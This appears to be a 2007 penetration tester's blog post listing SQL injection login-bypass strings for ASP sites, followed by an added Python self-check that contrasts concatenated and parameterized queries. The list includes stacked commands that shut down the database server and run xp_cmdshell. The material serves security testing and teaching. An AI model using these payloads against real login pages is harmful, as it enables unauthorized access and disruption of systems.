What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems: I simulate an organized, professional attack against your organization, after which a detailed report summarizes the weaknesses and exploited vectors. This will help you gain control over your infrastructure's security and maximize your protection.

Saturday, April 28, 2007

INJECTIONS, ATTACKING ASP LOGIN PAGES

Hi,

I have been looking into a lot of attacks, especially the shopadmin ones, on login pages and on other sites using different CMSs and running ASP.NET. I have seen that most of the sites, especially those hosted by ISPs, haven't just been hosted but archived, and the admins haven't even thought about how secure their login pages are. In this article, I will share with you some of the login attempts an attacker will try in order to gain administration.

Username: admin'--
username: ' or 1=1--

Username : admin
Password : admin' or a


Username : admin
Password : admin' or a=a --

user='' or ''=''
pass= '' or ''=''

- Login: hi' or 1=1--
- pass: hi' or 1=1--


Username: '; shutdown with nowait; --

Username: '; exec master..xp_xxx; --

Username: '; exec master..xp_cmdshell 'iisreset'; --


username = admin' or '6'='6




' or ''='

"'or''='"

'or"='

9,9,9

' or '

or 1=1?

or 1=1 --'

' or 'a'='a

admin'--

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

' or 'x'='x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

Chintan ' --

Chintan " --

' OR 1=1 ?

hi' or 'a'='a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

admin' or a=a --

admin" or "a"="a

admin" or 1=1 --

admin' or 1=1 --

admin' or 'a'='a

admin') or ('a'='a

admin") or ("a"="a

These are about enough, so test your login pages and drop me a mail in case you find these helpful.

Good weekend,

/Chuks
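
An added example, not part of the original post: a self-check that runs a few of the strings above against a login query built by string concatenation and against the same query with bound parameters. It assumes Python with an in-memory SQLite database standing in for the ASP/SQL Server stack the post discusses; the table, account and function names are constructed for illustration.

```python
import sqlite3

# Constructed sample data: one admin account in an in-memory SQLite database.
# A real application would store a salted password hash, not plaintext.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_concatenated(db, username, password):
    """The pattern these strings target: input pasted into the SQL text."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        return db.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # malformed SQL: the input reached the parser as code

def login_parameterized(db, username, password):
    """Same query with bound parameters: input is only ever data."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return db.execute(sql, (username, password)).fetchone() is not None

# (username, password) pairs built from strings in the post;
# "x" is a filler password added for this example.
POST_STRINGS = [
    ("admin'--", "x"),
    ("' or 1=1--", "x"),
    ("admin", "admin' or 'a'='a"),
    ("' or ''='", "' or ''='"),
    ("hi' or 1=1 --", "hi' or 1=1 --"),
]

def audit(login):
    """Return the pairs that log in without the real password."""
    db = make_db()
    return [pair for pair in POST_STRINGS if login(db, *pair)]

if __name__ == "__main__":
    print("concatenated accepts:", audit(login_concatenated))
    print("parameterized accepts:", audit(login_parameterized))
```

Any pair returned by `audit` for a login function means that function treats user input as SQL; the parameterized version should return an empty list while still accepting the real credentials.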
